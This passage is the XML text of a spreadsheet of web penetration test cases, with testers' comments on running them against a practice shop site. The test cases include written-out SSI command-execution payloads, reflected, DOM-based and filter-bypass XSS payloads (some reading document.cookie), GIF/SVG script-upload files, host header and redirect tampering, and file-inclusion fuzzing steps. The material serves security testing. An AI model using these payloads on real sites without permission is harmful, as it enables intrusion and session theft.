    <t>1.Open the firefox  browser and go to the web site
2.Check all the links in the website which has some fields on url to input like :-
http://any.com/iframei.php?ParamUrl=robots.txt&amp;ParamWidth=250&amp;ParamHeight=250</t>
  </si>
  <si>
    <t xml:space="preserve">Now verify if you are able to see the changes refelcted on the webpage after changing the values of "width" and "height"
</t>
  </si>
  <si>
    <t>Website should not allow the tampering of iframe parameters</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_19</t>
  </si>
  <si>
    <t>SSI Inejction</t>
  </si>
  <si>
    <t>SSI Inejction Post</t>
  </si>
  <si>
    <t>Verify if the application is vulnerable to SSI injection</t>
  </si>
  <si>
    <t>1.Open the firefox  browser and go to the web site
2.Check all the links in the website which has some input fields</t>
  </si>
  <si>
    <t>Now verify if user is able to input the below payloads in the input field:-
&lt;!--#echo var="DATE_LOCAL" --&gt;
&lt;!--#exec cmd="ls" --&gt;
&lt;!--#exec cmd="ls" --&gt;</t>
  </si>
  <si>
    <t>Application should not be vulnerable to SSI injection attack</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_20</t>
  </si>
  <si>
    <t>JIRA Misconfigaration</t>
  </si>
  <si>
    <t xml:space="preserve">JIRA account misconfig causes Sensitive Information Disclosure at Massive Level.
</t>
  </si>
  <si>
    <t>Verify if webapplication uses JIRA service and it improperly set.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: make sure webapplication uses jira service.
1.open browser and paste link given i.e https://target.atlassian.net/secure/ManageFilters.jspa?filterView=search&amp;filterView=search&amp;Search=Search&amp;sortColumn=favcount&amp;sortAscending=false
2.replace target with our testing website-&gt;and hit enter.
3.check if it disclose any employees roles, upcoming milestones, secret project and features through JIRA filters / dashboards.
</t>
  </si>
  <si>
    <t>jira service should not disclose any information through JIRA filters / dashboards with out authentication.</t>
  </si>
  <si>
    <t xml:space="preserve">JIRA account misconfig causes internal desk access.
</t>
  </si>
  <si>
    <t>Verify if webapplication uses JIRA service and we can do unauthorized access to internal service desk and raise requests.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: make sure webapplication uses jira service.
1.open browser and paste link given i.e https://target.atlassian.net/servicedesk/customer/user/login
2.replace target with our testing website-&gt;and hit go.
3.check if it as signup function enable-&gt;if there click on signup-&gt;enter valid email address-&gt;click on signup-&gt;now open email-&gt;we get email from jira@target.atlassian.net.
4.click on link we get from jira-&gt;enter username and password and click on signup
5.now we will get internal desk access-&gt;and we can raise unlimited requests to there internal desk.
</t>
  </si>
  <si>
    <t>signup function should be disable to external users.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_21</t>
  </si>
  <si>
    <t>Web cache_deception_attack.</t>
  </si>
  <si>
    <t>Web cache deception attack.</t>
  </si>
  <si>
    <t>verify webapplication use web cache functionality to store files.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup to the application and updated information.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit. 
3.now look for a page that may contain sensitive information such as myprofile,account details ex:(https://xyz.com/user/myprofile)
4.Now add any static file after /myprofile such as test.css, test.jpg ex:(http://xyz.com/user/myprofile/test.css) and browse.
5.now check if it displays the same /myprofile page if it displays it might be cached.
6.now open another browser and browse same link i.e https://xyz.com/user/myprofile/test.css.
7.now check if it displays sensitive information which we got before.
</t>
  </si>
  <si>
    <t>sensitive information should not be cached by an application.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_22</t>
  </si>
  <si>
    <t>Buffer overflow attack</t>
  </si>
  <si>
    <t>Bufferover flows in webapplications.</t>
  </si>
  <si>
    <t>Bufferover flow issue in input field due to lack of input validation or size limit.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup to the application and updated information.
1.Login into application and search for user input fileds.
2.Enter a long string in every input field.
3.If web application takes long time to save updated input details-&gt;server unable to process our request.
</t>
  </si>
  <si>
    <t>Application should not allow users to enter large inputs.</t>
  </si>
  <si>
    <t>Bufferover flow issue in signup/register form.</t>
  </si>
  <si>
    <t xml:space="preserve">1.Try to signup for webapplication in chrome while entering details (ex:username,passward,..) enter long string.
2.If webapplication allowing us to enter only limited number of characters.
3.Right click select inspect(Q) focus on input fields and search for max length temper max length value(ex:max_length=15 to max_length=1000)
4.check application behaves as normal else we successfully performed bufferover flow attack.
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_01</t>
  </si>
  <si>
    <t>Verify if entered data in the input parameter is reflected in response of burp</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this host
</t>
  </si>
  <si>
    <t>Cannot do Spider ,Spider option unavailable for the community version</t>
  </si>
  <si>
    <t>1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Repeater&gt; then go to repeater tab on burp
3.Replace input parameters with word "Hello" as shown below:-
GET /any.com?ngsw-cache-bust=0.8658280410910645 HTTP/1.1   
//ngsw-cache-bust is input parameter whose value we need to replace by
GET /ngsw.json?ngsw-cache-bust=Hello HTTP/1.1
4.Click Go and check the response. Verify if  "Hello" is reflected in the response</t>
  </si>
  <si>
    <t>Hello Word will be reflect in the web page path ,but it doesn't take value Hello in the HTML tag.copied the Url and checked to run where page will redirect to samenext page as expected</t>
  </si>
  <si>
    <t>If  "Hello" is reflected in the response, check how it is closed in the html form
1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on repeater and put xss payload which will now be '&gt;&lt;script&gt;alert(1)&lt;/script&gt;
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on repeater and put xss payload which will now be "'&gt;&lt;script&gt;alert(1)&lt;/script&gt;
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on repeater and put xss payload which will now be &gt;&lt;script&gt;alert(1)&lt;/script&gt;
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
5.If "Hello" is not enclosed in any tags then we can directly use &lt;script&gt;alert(1)&lt;/script&gt;
Verify the pop up error on webpage by right click on request tab of repeater-&gt;show response in browser-&gt; copy the url and paste in firefox.</t>
  </si>
  <si>
    <t xml:space="preserve"> Pop up error should not be displayed</t>
  </si>
  <si>
    <t>Hello is not enclosed any tags ,not present in html tag</t>
  </si>
  <si>
    <t xml:space="preserve">
You can also use other payloads as well mentioned in the doc to confirm
1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Intruder&gt; then go to intruder tab on burp-&gt; positions-&gt; click "Clear" button and select the parameter you want to attack and click "Add" button
3.Go to "Payloads" tab -&gt; click "Load" to load the above payloads file and then click "Start Attack" 
Now verify which responses has got the bigger size by sorting by size and right click on those requests of intruder attack-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t>Pop up error as per the payload should not be displayed</t>
  </si>
  <si>
    <t>No Popup error showing loginpage ,but in the path contained payload values but it is not effecting the url</t>
  </si>
  <si>
    <t>DOM-Based Cross Site scripting (XSS)</t>
  </si>
  <si>
    <t>Verify if the web application is vulnerable to DOM-Based XSS</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Select any request in Targets tab that contains JavaScript in the webpage properties (Search for &lt;script&gt; tag). Once you get the pages with script taf, below are the details you need to look for in Javascript
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Sources:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> document.URL, document.documentURI, location.href, location.search, location.*, window.name, document.referrer
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Sinks:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> HTML Modification sinks (document.write, (element).innerHTML), HTML modification to behaviour change((element).src (in certain elements)), Execution Related sinks, eval, setTimout / setInterval, execScript
2. One you find the webpages with Javascript, right click-&gt; send it to Repeater&gt; then go to repeater tab on burp. 
3. Add the payload as mentioned in the below example for your webpage 
Ex 1: http://www.example.com/test.html#value=&lt;script&gt;alert(1)&lt;/script&gt;
(Please note it is not mandatory for you add the value after hash key)
Ex: http://www.example.com/test.html#&lt;script&gt;alert(1)&lt;/script&gt;
4. If it gets exexuted and you get a pop-up, then replace 1 with document.cookie or document.domain</t>
    </r>
  </si>
  <si>
    <t>The application shouldn't show any vulnreable information like cookie details, domain details, etc</t>
  </si>
  <si>
    <t>Application is not showing any vulnreable information</t>
  </si>
  <si>
    <t>Cross Site Scripting using image tag payloads</t>
  </si>
  <si>
    <t>Verify if the web application is vulnerable to XSS by using different XSS vector though IMG tag</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Repeater&gt; then go to repeater tab on burp
3.Replace input parameters with word "Hello" as shown below:-
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>GET /any.com?ngsw-cache-bust=0.8658280410910645 HTTP/1.1   
//ngsw-cache-bust is input parameter whose value we need to replace by
GET /ngsw.json?ngsw-cache-bust=</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Hello</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> HTTP/1.1
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>4.Click Go and check the response. Verify if  "Hello" is reflected in the response</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">After changing the value in GET ,Hello is Not Reflected in the Re
sponse </t>
  </si>
  <si>
    <t>If  "Hello" is reflected in the response, check how it is closed in the html form
1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on repeater and put xss payload which will now be '&gt;&lt;script&gt;alert(1)&lt;/script&gt;
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on repeater and put xss payload which will now be "'&gt;&lt;script&gt;alert(1)&lt;/script&gt;
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on repeater and put xss payload which will now be &gt;&lt;script&gt;alert(1)&lt;/script&gt;
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
5.If "Hello" is not enclosed in any tags then we can directly use &lt;script&gt;alert(1)&lt;/script&gt;
Verify the pop up error on webpage by right click on request tab of repeater-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t xml:space="preserve">
Make sure you use the IMG payload mentioned in the document here
1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Intruder&gt; then go to intruder tab on burp-&gt; positions-&gt; click "Clear" button and select the parameter you want to attack and click "Add" button
3.Go to "Payloads" tab -&gt; click "Load" to load the above payloads file and then click "Start Attack" 
Now verify which responses has got the bigger size by sorting by size and right click on those requests of intruder attack-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t>XSS Payloaad 3.rtf file taking longer time to upload ,Url changes with value but still it will go for the destination.No changes in of the destinaton.</t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS) using &lt;a href tag</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable to &lt;a href tag</t>
  </si>
  <si>
    <t>Yes has some field</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Enter data </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>"Hello"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> in all the input fields on the page.Verify if "Hello" is reflected in the webpage or at the HTML level by right-clicking on the page and viewing the page source</t>
    </r>
  </si>
  <si>
    <t>Input value changes to Hello,Email should be contain with suffix .com</t>
  </si>
  <si>
    <t>(i). If  "Hello" is reflected on the web page, then try below payloads
&lt;A HREF="http://www.google.com/"&gt;XSS&lt;/A&gt;
&gt;&lt;A HREF="http://www.google.com/"&gt;XSS&lt;/A&gt;
"&lt;A HREF="http://www.google.com/"&gt;XSS&lt;/A&gt;
"&gt;&lt;A HREF="http://www.google.com/"&gt;XSS&lt;/A&gt;
"/&gt;&lt;A HREF="http://www.google.com/"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>A google link with the XSS text shouldn't be displayed in the webpage</t>
  </si>
  <si>
    <t>No Changes in the link</t>
  </si>
  <si>
    <t>Bypassing WAF to perform XSS</t>
  </si>
  <si>
    <t>Verify if we can bypass WAF to perform Cross Site Scripting</t>
  </si>
  <si>
    <t>Currenlty provided video tutorials are for burp suite 1.0. In the new version these instructions are no longer valid. In 2.0 there is no spider tab like there are in the instructional videos. There is also no "send to spider" option in the right click menu. In 2.0 you have to select scan and then select the crawl option.</t>
  </si>
  <si>
    <t>In 2.0 it seems that the "Go" button was replaced by the "Send button"</t>
  </si>
  <si>
    <t xml:space="preserve">Was unable to find any cases where the response, in the repeater tab, contained the word that was sent as a pararmeter. I would have appreciated a mix of positive and negitive cases so I could determine if I am preforming the steps correctly. </t>
  </si>
  <si>
    <t xml:space="preserve">
Make sure you use the WAF payload mentioned in the document here
1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Intruder&gt; then go to intruder tab on burp-&gt; positions-&gt; click "Clear" button and select the parameter you want to attack and click "Add" button
3.Go to "Payloads" tab -&gt; click "Load" to load the above payloads file and then click "Start Attack" 
Now verify which responses has got the bigger size by sorting by size and right click on those requests of intruder attack-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t>Bypassing WAF through obfuscation of alert to perform XSS</t>
  </si>
  <si>
    <t>Verify if we can bypass WAF by obfuscating alert to perform Cross Site Scripting</t>
  </si>
  <si>
    <t>Currenlty provided video tutorials are for burp suite 1.0. In the new version these instructions are no longer valid. In 2.0 there is no spider tab like there is in the instructional videos. There is also no "send to spider" option in the right click menu. In 2.0 you have to select scan and then select the crawl option.</t>
  </si>
  <si>
    <t xml:space="preserve">Was unable to find any cases where the response, in the repeater tab, contained the word that was sent as a pararmeter. I would have appreciated a mix of positive and negitive test cases so I could haved determined if I am preforming the steps correctly. </t>
  </si>
  <si>
    <t xml:space="preserve">
Make sure you use the XSS Obfuscate payload mentioned in the document here
1.Select any request in Targets tab "Contents" with parameters except cookie parameters.
2. Right click-&gt; send it to Intruder&gt; then go to intruder tab on burp-&gt; positions-&gt; click "Clear" button and select the parameter you want to attack and click "Add" button
3.Go to "Payloads" tab -&gt; click "Load" to load the above payloads file and then click "Start Attack" 
Now verify which responses has got the bigger size by sorting by size and right click on those requests of intruder attack-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t>Cross Site scripting (XSS) by  Bypassing non-recursive filtering</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable for XSS through  Bypassing non-recursive filtering</t>
  </si>
  <si>
    <t xml:space="preserve">What website? Your instruction document provided stated we should use Juice Shop or a site/tool that seems to be stored on someones host machine but the machine is not up and running. So I chose the juice shop site for testing, unsure if this is a good candidate for the test or not. Ideally the test step should list the specific website and login instructions etc.Should we be using burpsuite for this test? If so this is not listed anywhere in the test so I assume it is not needed, if it is needed the test should state to use it in the appropriate place. </t>
  </si>
  <si>
    <t>The verification instructions to verify if 'Hello' is displayed in the source code should be more detailed, in actuality you should use 'inspect element' not page source code, further instructions on where to look in the inspect element HTML code should also be included.</t>
  </si>
  <si>
    <t>(i). If  "Hello" is reflected on the web page (apart from the input field) then enter
&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;. Verify if you get an alert pop up. Also try for below options
"&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;
&gt;&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;
"&gt;&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;
"/&gt;&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;
'&gt;&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;
'/&gt;&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;
'&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">The expected pop up did not appear.The juice shop website allowed java script to be injected into the security answer field. Also more detailed instructions should be listed to specify that you only need to copy one &lt;&gt; of java script samples and paste it into one of the text fields on the website.Unsure if using burp for this test would have resulted in a different outcome. </t>
  </si>
  <si>
    <t>Cross Site scripting (XSS) through HTTP parameter pollution</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable for XSS through parameter pollution</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has some fields on URL to input some data like "search",first name,lastname etc. (You should be searching for URL with query parameter)</t>
  </si>
  <si>
    <t>Simply stating "all links in the website" is not specific enough for manual browsing. Perhaps break the steps down by site page. One of the website links did not work so I was only able to use Juice Shop.</t>
  </si>
  <si>
    <t>Now try for XSS through parameter pollution
Ex: If the URL is https://www.any.com/search?q=test, then try with below payloads
https://www.any.com/search?q=&lt;script&amp;param=&gt;[...]&lt;/&amp;param=script&gt;
https://www.any.com/search?q=test&amp;q=&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Cross Site scripting (XSS) through iframe payload</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable for XSS through iframe payload</t>
  </si>
  <si>
    <t xml:space="preserve">Where does one find each of these input fields? You need to explicitly state how to navigate the page.
 I would advise having separate test cases for each one. </t>
  </si>
  <si>
    <t>Now try for XSS through below iframe payloads
&lt;iframe src="javascript:alert(`xss`)"&gt;
"&gt;&lt;iframe src="javascript:alert(`xss`)"&gt;
'&gt;&lt;iframe src="javascript:alert(`xss`)"&gt;
'/&gt;&lt;iframe src="javascript:alert(`xss`)"&gt;
&gt;&lt;iframe src="javascript:alert(`xss`)"&gt;
"&gt;&lt;iframe src="javascript:alert(`xss`)"&gt;
"/&gt;&lt;iframe src="javascript:alert(`xss`)"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">It needs to be clearly stated what exactly you want. What will the pop-up say? As there are many messages, it's important to know exactly which one you are expecting.
</t>
  </si>
  <si>
    <t>1.10.</t>
  </si>
  <si>
    <t>Cross Site scripting (XSS) through file upload</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable for XSS through file upload</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2. Identify the pages in the site where you can upload a file</t>
  </si>
  <si>
    <t>This should be split into two test cases, one for each file type. There needs to be clear instructions where to navigate to find the file upload locations.</t>
  </si>
  <si>
    <t>If it accepts GIF format, add a below payload and save it as Gif
GIF89a/*&lt;svg/onload=alert(1)&gt;*/=alert(document.domain)//;</t>
  </si>
  <si>
    <t>Upload the file into the page</t>
  </si>
  <si>
    <t>What will the pop-up say? As there are many messages, it's important to know exactly which one you are expecting.</t>
  </si>
  <si>
    <t>If it accepts SVG format, add a below payload and save it as svg
&lt;svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/&gt;</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_02</t>
  </si>
  <si>
    <t>Host Header Attack by changing hostname</t>
  </si>
  <si>
    <t>Verify if domain accepts different hosts</t>
  </si>
  <si>
    <t>Update you instructions to be in line with the most recent version of burp suite. Right clicking does not have a spider option for newest version.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. Select any request in Targets tab "Contents" 
2. Right click-&gt; send it to Repeater&gt; then go to repeater tab on burp
3. Replace the original "Host" with any other website name as shown below:-
 suppose the host is any.com, it will be displayed under repeater reqeust page as 
GET /ngsw.json?ngsw-cache-bust=0.8658280410910645 HTTP/1.1
Host: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">any.com
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Now we change the host to bing.com to verify if user is navigated to it as shown below
GET /ngsw.json?ngsw-cache-bust=0.8658280410910645 HTTP/1.1
Host: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">bing.com
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Right click on request tab of repeater-&gt;show response in browser-&gt; copy the url and paste in firefox.</t>
    </r>
  </si>
  <si>
    <t>User should not be navigated to bing.com</t>
  </si>
  <si>
    <t>Make sure that all required steps are listed. For example, to navigate to the page after pasteing in Firefox, you need to turn intercept off.</t>
  </si>
  <si>
    <t>Host Header Attack by including X-Forwarded-Host</t>
  </si>
  <si>
    <t>Verify if by including X-Forwarded-Host in request, domain accepts different hosts</t>
  </si>
  <si>
    <t xml:space="preserve">
1. Select any request in Targets tab "Contents" 
2. Right click-&gt; send it to Repeater&gt; then go to repeater tab on burp
3. include a new header in reqeust with any other website name as shown below:-
GET /ngsw.json?ngsw-cache-bust=0.8658280410910645 HTTP/1.1
Host: any.com
X-Forwarded-Host: bing.com</t>
  </si>
  <si>
    <t>Host Header Attack by interchanging values of "Host" and "X-Forwarded-Host"</t>
  </si>
  <si>
    <t>Verify if by interchanging the values of "Host" and "X-forwarded-Host" domain accepts different hosts</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. Select any request in Targets tab "Contents" 
2. Right click-&gt; send it to Repeater&gt; then go to repeater tab on burp
3. Interchange the values of "Host" and "X-forwarded-Host" as shown below:-
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">GET /ngsw.json?ngsw-cache-bust=0.8658280410910645 HTTP/1.1
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Host: bing.com
X-Forwarded-Host: any.com</t>
    </r>
  </si>
  <si>
    <t>QT_PEN_TIER_2_03</t>
  </si>
  <si>
    <t>Url Redirection using parameters</t>
  </si>
  <si>
    <t>Verify if user is able to redirect to other website by using parameters like url,redirect,uri,reference e.t.c</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the website(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this host
</t>
  </si>
  <si>
    <t xml:space="preserve">
1. Click on burp tab in burp suite-&gt; click search-&gt;select "in-scope only" and "request headers"
2. Search the parameters like url=, uri=, redirect=, reference= in search bar
3. If requests are found containing these parameters-&gt; send to repeater and change the parameters value with malicious webiste you want user to navigate to as shown below
GET /comment.php?redirect=www.bing.com HTTP/1.1
Host: testphp.vulnweb.com</t>
  </si>
  <si>
    <t>User should not be redirected to testphp.vulnweb.com</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_04</t>
  </si>
  <si>
    <t>Verify if user is able to tamper the data in fields like rate,price,amount,amt,quantity,qty,e.t.c</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and keep the intercept off
</t>
  </si>
  <si>
    <t xml:space="preserve">
1.Go to any website on which a user has to buy or book something -&gt;add the items in the cart-&gt; turn the intercept on in burp and proceed to check out.
2. Capture the request in burp-&gt; keep clicking on "forward" button until you come across parameters like  rate,price,amount,quantity,qty-&gt; change the value of those parameters and forward the request
3. Go to the website and check if changed value is reflected
</t>
  </si>
  <si>
    <t>Tampered value should not be reflected</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_05</t>
  </si>
  <si>
    <t>File Inclusion using parameters(LFI)</t>
  </si>
  <si>
    <t>Verify if file inclusion exist on the website using a list of possible parameters</t>
  </si>
  <si>
    <t xml:space="preserve"> List of possible parameters:
[file,document,folder,root,path,pg,style,pdf,template,php_path,doc,dest,redirect,uri,path,coninue,url,window,next,data,reference,site,html,val,validate,domain,callback,return,page,feed,host,port,to,out,view,dir,show,navigation,open]
1. Click on burp tab in burp suite-&gt; click search-&gt;select "in-scope only" and "request headers"
2. Search for the parameters given above
3. If requests are found containing these parameters-&gt;Right click-&gt; send it to Intruder-&gt; then go to intruder tab on burp-&gt; go to "Positions"-&gt; click "Clear" button and select the parameter you want to attack and click "Add" button
3.Go to "Payloads" tab -&gt; click "Load" to load the payloads file and then click "Start Attack" 
Now verify which responses has got the bigger size by sorting the payload output by size and right click on those requests of intruder attack-&gt;show response in browser-&gt; copy the url and paste in browser.
</t>
  </si>
  <si>
    <t>User  should not be able to view system configuration files</t>
  </si>
  <si>
    <t>Remote File Inclusion (RFI)</t>
  </si>
  <si>
    <t>Veirfy if a website shows the content of files hosted on differen servers</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>•</t>
    </r>
    <r>
